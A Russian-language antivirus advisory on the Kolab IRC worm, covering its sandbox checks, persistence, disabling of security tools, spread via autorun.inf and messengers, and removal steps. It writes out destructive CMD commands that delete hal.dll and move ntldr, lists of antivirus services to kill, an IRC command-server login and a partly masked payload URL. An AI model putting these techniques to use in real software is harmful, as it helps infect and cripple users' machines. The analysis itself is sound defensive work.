Net-Worm.Win32.Kolab.wwu

Технические детали

Червь, предоставляющий злоумышленнику удаленный доступ к зараженной машине. Является приложением Windows (PE-EXE файл). Имеет размер 227480 байт. Упакована при помощи UPX. Распакованный размер - около 1.4 Мб. Написана на C++.

Антиотладка

После запуска червь проверяет наличие виртуальной среды (песочницы) по следующим параметрам:

• Сверяет значения параметра "0" со строками:

  VMware
  VBox
  Virtual
  QEMU
  

  в ключе системного реестра:

  [HKLM\System\ControlSet001\Services\Disk\Enum]

• Имя оригинального файла содержит строки:

  sample
  virus
  sand-box
  sandbox
  malware
  test
  

• Имя компьютера и имя пользователя содержат строки:

  VMG-CLIENT
  MORTE
  Malekal
  HOME-OFF-D5F0AC
  DELL-D3E62F7E26
  KAKAPROU-6405DA
  

• Присутствие в системе запущенных процессов, имена которых содержат строки:

  port
  vbox
  vmsrvc
  vmware
  tcpview
  wireshark.exe
  regshot.exe
  procmon.exe
  filemon.exe
  regmon.exe
  procdump.exe
  cports.exe
  procexp.exe
  squid.exe
  dumpcap.exe
  

• Наличие окон со следующими параметрами:

  

• По наличию файлов:

  C:\Program Files\WinPcap\rpcapd.exe
  C:\Program Files\WireShark\rawshark.exe
  C:\Program Files\Ethereal\ethereal.html
  C:\Program Files\Microsoft Network Monitor 3\netmon.exe
  

  Вредонос завершает свое выполнение при обнаружении хотя бы одного из перечисленных условий, при этом удаляется оригинальный файл вредоноса.

  Инсталляция

  Затем вредонос скрывает системный каталог, устанавливая ему атрибут "Скрытый", и копирует в него свой оригинальный файл под именем:

  %System%\igfxtm32.exe

  Также, если процесс вредоноса запускается без прав администратора – червь копирует свое тело в каталог текущего пользователя:

  %Document and Settings%\%Current User%\igfxtm32.exe

  Для автоматического запуска при следующей загрузке ОС Windows червь добавляет ссылку на свой исполняемый файл в ключ автозапуска системного реестра:

  [HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
  "Intel Task Management"="%System%\igfxtm32.exe"
  

  
  

  Деструктивная активность

  После запуска червь выполняет следующие действия:

  • удаляет файл, путь к которому указан в параметре.
  • Добавляет себя в список разрешенных для доступа в сеть приложений в файрвол Windows, сохраняя следующий параметр в ключе реестра:

    [HKLM\System\CurrentControlSet\Services\SharedAccess\
    Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List]
    "%System%\igfxtm32.exe"="%System%\igfxtm32.exe:*:Enabled:wLAN"
    
    [HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\
    FirewallPolicy\StandardProfile\AuthorizedApplications\List]
    "%System%\igfxtm32.exe"="%System%\igfxtm32.exe:*:Enabled:wLAN"
    

  • Запрещает отображение скрытых файлов, изменяя значения ключей системного реестра:

    [HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\
    Folder\SuperHidden]
    "CheckedValue" = "1"
    
    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
    "Hidden" = "2"
    

  • Разрешает своему приложению всегда запускаться с правами администратора, добавляя ссылку на свой исполняемый файл в список исключений DEP (Data Execution Prevention), путем модификации ключа реестра:

    [HKLM\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\
    Layers]"%System%\igfxtm32.exe"="DisableNXShowUI"
    

  • Отключает восстановление системы, изменяя значения ключей:

    [HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore]
    "DisableSR" = "1"
    
    [HKLM\Software\Policies\Microsoft\Windows NT\SystemRestore]
    "DisableConfig" = "1"
    

  • Изменяет настройки "Центра обеспечения безопасности" Windows, отключая его уведомления и компоненты. Для этого изменяются значения ключей:

    [HKLM\Software\Microsoft\Security Center]
    "AntiVirusOverride" = "1"
    "AntiVirusDisableNotify" = "1"
    "FirewallOverride" = "1"
    

  • Блокирует загрузку зараженного компьютера в "безопасном режиме" удаляя все ключи в ветвях системного реестра:

    [HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal]
    [HKLM\System\CurrentControlSet\Control\SafeBoot\Network]
    

  • Запрещает отправку информации в Майкрософт о найденных на компьютере угрозах, создавая ключ системного реестра:

    [HKLM\Software\Policies\Microsoft\MRT]
    "DontReportInfectionInformation" = "1"
    

  • Отключает автоматический запуск службы "wscsvc" ("Центр обеспечения безопасности" Windows), изменяя значение ключа:

    [HKLM\System\CurrentControlSet\Services\wscsvc]
    "Start" = "4"
    

  • Находит и завершает процессы со следующими именами:

    MBAMGUI.EXE 
    COMBOFIX.EXE 
    CATCHME.EXE 
    TEATIMER.EXE 
    MRT.EXE 
    MRTSTUB.EXE 
    TCPVIEW.EXE 
    HIJACKTHIS.EXE 
    MSMPENG.EXE 
    MSASCUI.EXE 
    MPCMDRUN.EXE 
    USBGUARD.EXE 
    BILLY.EXE
    

  • Подменяет файлы:

    C:\cwsandbox\cwsandbox.exe
    C:\Program Files\Wireshark\wireshark.exe
    

    копией файла:

    %WinDir%\notepad.exe

  • Завершает процессы и удаляет их исполняемые файлы:
  • Если в пути запуска файла содержится строка:

    Recycler

  • Если имя файла:

    rvhost.exe
    msvmiode.exe
    drive32.exe
    wudfhost.exe
    svchos.exe
    servicers.exe
    uninstall_.exe
    undmgr.exe
    chgservice.exe
    usbmngr.exe
    serivces.exe
    cmmon32.exe
    

    и путь запуска не содержит строк

    tmp
    temp
    

  • Останавливает и удаляет службы антивирусных приложений и утилит сбора системной информации:

    CSIScanner
    K7RTScan
    K7TSMngr
    DrWebEngine
    SPIDERNT
    DrWebCom
    avast! Antivirus
    avast! Firewall
    AntiVirService
    VSSERV
    avgfws
    avgwd
    avg8wd
    avg9wd
    NOD32krn
    ekrn
    mcmscsvc
    McShield
    MSK80Service
    McNASvc
    MpfService
    McODS
    McSysmon
    SmcService
    Symantec AntiVirus
    Norton Antivirus Server
    MBAMProtector
    MBAMSwissArmy
    MBAMService
    WebrootSpySweeperService
    WRConsumerService
    Amsp
    SAVService
    SAVAdminService
    Sophos AutoUpdate Service
    Sophos Client Firewall
    Sophos Client Firewall Manager
    OutpostFirewall
    TMBMServer
    TmPfw
    KPF4
    cmdAgent
    vsmon
    SbPF.Launcher
    SPF4
    acssrv
    

  • Если в ходе своей работы червь находит в системе окна с параметрами:

    

    то будет запущена последовательность команд:

    CMD /C attrib -s -h "C:\ntldr"
    CMD /C move "C:\ntldr" "C:\dump"
    CMD /C del /F /S /Q "%WINDIR%\system32\hal.dll"
    

    Таким образом, системный файл "C:\ntldr" перемещается в "C:\dump", после чего удаляется файл:

    %System%\hal.dll

    Далее завершается работа процесса "csrss.exe" и выполняется команда:

    CMD /C "shutdown –s

    Это приведет к перезагрузке системы.
  • Если в ходе своей работы червь находит в системе окна с параметрами:

    

    то будет завершена работа процесса "csrss.exe" и выполнена команда:

    CMD /C "shutdown –s

    Это приведет к перезагрузке системы.
  • Если в ходе своей работы червь обнаружит в системе запущенный процесс с именем, содержащим подстроку ".cfxxe", то будет выполнена команда:

    CMD /C del /F /S /Q \"C:\\ComboFix.txt\"

    Это приведет к удалению файла "C:\ComboFix.txt".
  • Для контроля уникальности своего процесса в системе троянец создает уникальный идентификатор с именем "V8x".
  • Внедряет свой вредоносный код в адресное пространство процесса "explorer.exe". При помощи данного внедренного кода червь выполняет загрузку своего обновленного исполняемого файла по ссылке:

    http://vm.le***lay.su/net/s1.exe

    и сохраняет загруженный файл в системный каталог с именем:

    %System%\igfxtm32.exe

    Затем файл запускается на выполнение.
  • Для выполнения своего основного вредоносного функционала червь обращается к одному из командных центров, которые располагаются по следующим ссылкам:

    s16.le***play.su
    s23.le***lay.su
    

    При подключении к IRC серверу червь передает следующие данные:

    PASS su1c1d3 NICK N|<локализация_системы>|Z-467|0|
    <версия_ОС>|<служебная_информация>
    USER XP-SPX N|<локализация_системы>|Z-467|0|
    <версия_ОС>|<служебная_информация> N|
    <локализация_системы>|Z-467|0|<версия_ОС>|
    <служебная_информация> :
    <имя_сомпьютера>
    

    Далее подключается к каналу

    JOIN #te3pe3 n3t!

    Бот получает с сервера зашифрованную ссылку, а также отправляет сообщение с указанием внешнего и внутреннего IP адреса зараженной системы. По расшифрованной ссылке червь загружает и запускает файл на выполнение. Данный червь загружал файлы по ссылке:

    http://gi***ka.com/v/.exe 

    где rnd – десятичное число. Загруженный файл проявлял функционал спам-бота – выполнял массовые рассылки почтовых сообщений.

  Также по полученным командам от сервера червь может выполнять следующий функционал:

  • Производить самоуничтожение;
  • Подключатся к другому IRC каналу;
  • Распространяться, используя программы обмена мгновенными сообщениями;
  • Рассылать произвольные файлы, используя программы обмена мгновенными сообщениями.

  Распространение:

  Распространение вредоноса происходит:
  • При помощи сменных и сетевых дисков, на которые помещается файл:

    <Имя_Диска>:\~TrashBin\t34573147.exe

    Данный файл загружается по ссылке получаемой от управляющего сервера. Вместе с исполняемым файлом червь помещает файл:

    <Имя_Диска>:\autorun.inf

    Который вперемешку с "мусорными" строками, содержит:

    [Autorun]
    open=~TrashBin\t34573147.exe
    icon=%windir%\system32\SHELL32.dll,4
    action=Open drive to view files with Explorer
    shell\open=Open
    shell\open\command=~TrashBin\t34573147.exe
    shell\open\default=1
    shell\explore=Explore
    shell\explore\command=~TrashBin\t34573147.exe
    shell\search=Search...
    shell\search\command=~TrashBin\t34573147.exe
    useautoplay=1
    

    Что позволяет червю запускаться каждый раз, когда пользователь открывает зараженный раздел при помощи программы "Проводник". Созданным файлам присваиваются атрибуты "скрытый" (hidden) и "системный" (system).
  • При помощи программ обмена мгновенными сообщениями:

    Skype
    AIM
    ICQ
    Yahoom Instant Messenger
    Google Talk
    MSN Messenger
    Paltalk
    Xfire
    

  • По локальным ресурсам, при использовании уязвимости MS10-061.
  
  

  Рекомендации по удалению

  Если ваш компьютер не был защищен антивирусом и оказался заражен данной вредоносной программой, то для удаления необходимо выполнить следующие действия:

  1. Если ваш компьютер не был защищен антивирусом и оказался заражен данной вредоносной программой, то для её удаления необходимо воспользоваться Kaspersky Rescue Disk (скачать Kaspersky Rescue Disk).
  2. Удалить оригинальный файл вредоноса (его расположение на зараженном компьютере зависит от способа, которым программа попала на компьютер).
  3. Удалить файлы:

     %System%\igfxtm32.exe
     %Document and Settings%\%Current User%\igfxtm32.exe
     <Имя_Диска>:\~TrashBin\t34573147.exe
     <Имя_Диска>:\autorun.inf
     

  4. Удалить параметры в ключе системного реестра:

     [HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
     "Intel Task Management"="%System%\igfxtm32.exe"
     
     [HKLM\System\CurrentControlSet\Services\SharedAccess\
     Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\
     List]
     "%System%\igfxtm32.exe"="%System%\igfxtm32.exe:*:Enabled:wLAN"
     
     [HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\
     FirewallPolicy\StandardProfile\AuthorizedApplications\List]
     "%System%\igfxtm32.exe"="%System%\igfxtm32.exe:*:Enabled:wLAN"
     
     [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
     "Hidden"=dword:00000002
     
     [HKLM\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\
     Layers]
     "%System%\igfxtm32.exe"="DisableNXShowUI"
     
     [HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore]
     "DisableSR" = "1"
     
     [HKLM\Software\Policies\Microsoft\Windows NT\SystemRestore]
     "DisableConfig" = "1"
     
     [HKLM\Software\Microsoft\Security Center]
     "AntiVirusOverride" = "1"
     "AntiVirusDisableNotify" = "1"
     "FirewallOverride" = "1"
     
     [HKLM\Software\Policies\Microsoft\MRT]
     "DontReportInfectionInformation" = "1"
     

  5. В случае, когда были удалены системные файлы, восстановить систему из резервной копии.
  6. Произвести полную проверку компьютера Антивирусом Касперского с обновленными антивирусными базами (скачать пробную версию).